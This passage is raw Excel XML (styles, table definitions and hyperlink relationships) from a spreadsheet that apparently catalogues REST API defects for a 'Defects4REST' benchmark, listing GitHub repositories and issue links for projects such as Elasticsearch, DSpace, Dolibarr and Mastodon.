      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="34" numFmtId="4" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="3" fillId="0" fontId="33" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="6" fillId="0" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="12" fillId="0" fontId="42" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="15" fillId="0" fontId="43" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="34" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="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RQ1 (607 defects classified int-style">
      <tableStyleElement dxfId="1" type="headerRow"/>
      <tableStyleElement dxfId="2" type="firstRowStripe"/>
      <tableStyleElement dxfId="3" type="secondRowStripe"/>
    </tableStyle>
    <tableStyle count="3" pivot="0" name="Defects4REST v1.0 benchmark (47-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608" displayName="Table2" name="Table2" id="1">
  <autoFilter ref="$A$1:$E$608"/>
  <tableColumns count="5">
    <tableColumn name="issue_no" id="1"/>
    <tableColumn name="repo" id="2"/>
    <tableColumn name="url" id="3"/>
    <tableColumn name="defect type" id="4"/>
    <tableColumn name="rationale" id="5"/>
  </tableColumns>
  <tableStyleInfo name="RQ1 (607 defects classified int-style" showColumnStripes="0" showFirstColumn="1" showLastColumn="1" showRowStripes="1"/>
</table>
</file>

<file path=xl/tables/table2.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" ref="A1:C474" displayName="Table1" name="Table1" id="2">
  <tableColumns count="3">
    <tableColumn name="issue_no" id="1"/>
    <tableColumn name="repo" id="2"/>
    <tableColumn name="issue_url" id="3"/>
  </tableColumns>
  <tableStyleInfo name="Defects4REST v1.0 benchmark (47-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bbernhard/signal-cli-rest-api" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/r-spacex/SpaceX-API" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/silverapp/silver" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/openstf/stf" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/spring-petclinic/spring-petclinic-rest" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/supabase/supabase" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/strapi/strapi" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/NatLibFi/Annif" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/encode/apistar" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/zalando-incubator/catwatch" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/louislam/uptime-kuma" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/traefik/traefik" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/vercel/vercel" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nightscout/cgm-remote-monitor" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/corona-warn-app/cwa-verification-server" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/treasure-data/digdag" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sunscrapers/djoser" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OrchardCMS/OrchardCore" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/makeplane/plane" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Jigsaw-Code/outline-server" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/getredash/redash" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/containers/podman" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/apilayer/restcountries" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/RefugeRestrooms/refugerestrooms/issues" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/shopizer-ecommerce/shopizer" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/seaweedfs/seaweedfs" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/confluentinc/kafka-rest" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/localsend/localsend" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/HumanSignal/label-studio" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mastodon/mastodon" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/k8ssandra/management-api-for-apache-cassandra" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kgrzybek/modular-monolith-with-ddd" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/MobSF/Mobile-Security-Framework-MobSF" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/netbox-community/netbox" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/gpodder/mygpo" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nocodb/nocodb" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Netflix/zuul" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing1.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/strapdata/elassandra" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/enviroCar/enviroCar-server/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/elastic/elasticsearch" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/TryGhost/Ghost" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/flowable/flowable-engine" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/snarfed/granary" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/HTTP-APIs/hydrus" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hummingbot/hummingbot"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github.com/elastic/elasticsearch/issues/117680" TargetMode="External"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/elastic/elasticsearch/issues/117712" TargetMode="External"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/elastic/elasticsearch/issues/117711" TargetMode="External"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/elastic/elasticsearch/issues/117710" TargetMode="External"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/elastic/elasticsearch/issues/117709" TargetMode="External"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/elastic/elasticsearch/issues/117099" TargetMode="External"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/strapdata/elassandra/issues/346" TargetMode="External"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/strapdata/elassandra/issues/323" TargetMode="External"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/strapdata/elassandra/issues/298" TargetMode="External"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/elastic/elasticsearch/issues/117596" TargetMode="External"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/elastic/elasticsearch/issues/117525" TargetMode="External"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/strapdata/elassandra/issues/295" TargetMode="External"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/strapdata/elassandra/issues/282" TargetMode="External"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/strapdata/elassandra/issues/163" TargetMode="External"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/strapdata/elassandra/issues/70" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/10053" TargetMode="External"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/9667" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/8920" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/8888" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/strapdata/elassandra/issues/68" TargetMode="External"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/strapdata/elassandra/issues/65" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/strapdata/elassandra/issues/7" TargetMode="External"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/elastic/elasticsearch/issues/118401" TargetMode="External"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/elastic/elasticsearch/issues/118320" TargetMode="External"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/elastic/elasticsearch/issues/118274" TargetMode="External"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/elastic/elasticsearch/issues/118273" TargetMode="External"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/elastic/elasticsearch/issues/118405" TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/33949" TargetMode="External"/><Relationship Id="rId392" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mastodon/mastodon/issues/28539" TargetMode="External"/><Relationship Id="rId391" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mastodon/mastodon/issues/28455" TargetMode="External"/><Relationship Id="rId390" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mastodon/mastodon/issues/28381" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/NatLibFi/Annif/issues/27" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/NatLibFi/Annif/issues/187" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/NatLibFi/Annif/issues/208" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/33689" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/NatLibFi/Annif/issues/389" TargetMode="External"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/32145" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/encode/apistar/issues/94" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/31369" TargetMode="External"/><Relationship Id="rId385" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mastodon/mastodon/issues/27288" TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/31015" TargetMode="External"/><Relationship Id="rId384" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mastodon/mastodon/issues/27194" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/30950" TargetMode="External"/><Relationship Id="rId383" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/k8ssandra/management-api-for-apache-cassandra/issues/18" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/30828" TargetMode="External"/><Relationship Id="rId382" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/localsend/localsend/issues/1777" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/NatLibFi/Annif/issues/459" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/32111" TargetMode="External"/><Relationship Id="rId389" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mastodon/mastodon/issues/28258" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/NatLibFi/Annif/issues/470" TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/32096" TargetMode="External"/><Relationship Id="rId388" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mastodon/mastodon/issues/28233" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/NatLibFi/Annif/issues/556" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/32072" TargetMode="External"/><Relationship Id="rId387" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mastodon/mastodon/issues/28003" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/encode/apistar/issues/17" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/31677" TargetMode="External"/><Relationship Id="rId386" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mastodon/mastodon/issues/27305" TargetMode="External"/><Relationship Id="rId381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/localsend/localsend/issues/461" TargetMode="External"/><Relationship Id="rId380" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/HumanSignal/label-studio/issues/3649" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/30800" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/30432" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/30161" TargetMode="External"/><Relationship Id="rId379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/HumanSignal/label-studio/issues/3589" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/29421" TargetMode="External"/><Relationship Id="rId374" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/confluentinc/kafka-rest/issues/77" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/29372" TargetMode="External"/><Relationship Id="rId373" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/confluentinc/kafka-rest/issues/65" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/29292" TargetMode="External"/><Relationship Id="rId372" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/confluentinc/kafka-rest/issues/37" TargetMode="External"/><Relationship Id="rId371" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/HTTP-APIs/hydrus/issues/462" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/29797" TargetMode="External"/><Relationship Id="rId378" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/HumanSignal/label-studio/issues/3033" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/29594" TargetMode="External"/><Relationship Id="rId377" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/confluentinc/kafka-rest/issues/475" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/29439" TargetMode="External"/><Relationship Id="rId376" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/confluentinc/kafka-rest/issues/341" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/29424" TargetMode="External"/><Relationship Id="rId375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/confluentinc/kafka-rest/issues/118" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/8792" TargetMode="External"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/8765" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/8732" TargetMode="External"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/7946" TargetMode="External"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/7126" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/3713" TargetMode="External"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/3440" TargetMode="External"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/8494" TargetMode="External"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/8479" TargetMode="External"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/8023" TargetMode="External"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/7992" TargetMode="External"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/3284" TargetMode="External"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/3207" TargetMode="External"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/3185" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/3090" TargetMode="External"/><Relationship Id="rId396" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mastodon/mastodon/issues/30103" TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/3032" TargetMode="External"/><Relationship Id="rId395" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mastodon/mastodon/issues/30039" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/2962" TargetMode="External"/><Relationship Id="rId394" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mastodon/mastodon/issues/29127" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/2826" TargetMode="External"/><Relationship Id="rId393" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mastodon/mastodon/issues/29071" TargetMode="External"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/3184" TargetMode="External"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/3130" TargetMode="External"/><Relationship Id="rId399" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mastodon/mastodon/issues/30860" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/3116" TargetMode="External"/><Relationship Id="rId398" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mastodon/mastodon/issues/30783" TargetMode="External"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DSpace/DSpace/issues/3110" TargetMode="External"/><Relationship Id="rId397" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mastodon/mastodon/issues/30578" TargetMode="External"/><Relationship Id="rId808" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/silverapp/silver/issues/469" TargetMode="External"/><Relationship Id="rId807" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/silverapp/silver/issues/384" TargetMode="External"/><Relationship Id="rId806" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/silverapp/silver/issues/353" TargetMode="External"/><Relationship Id="rId805" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/silverapp/silver/issues/289" TargetMode="External"/><Relationship Id="rId809" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/r-spacex/SpaceX-API/issues/36" TargetMode="External"/><Relationship Id="rId800" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/silverapp/silver/issues/161" TargetMode="External"/><Relationship Id="rId804" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/silverapp/silver/issues/228" TargetMode="External"/><Relationship Id="rId803" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/silverapp/silver/issues/204" TargetMode="External"/><Relationship Id="rId802" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/silverapp/silver/issues/203" TargetMode="External"/><Relationship Id="rId801" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 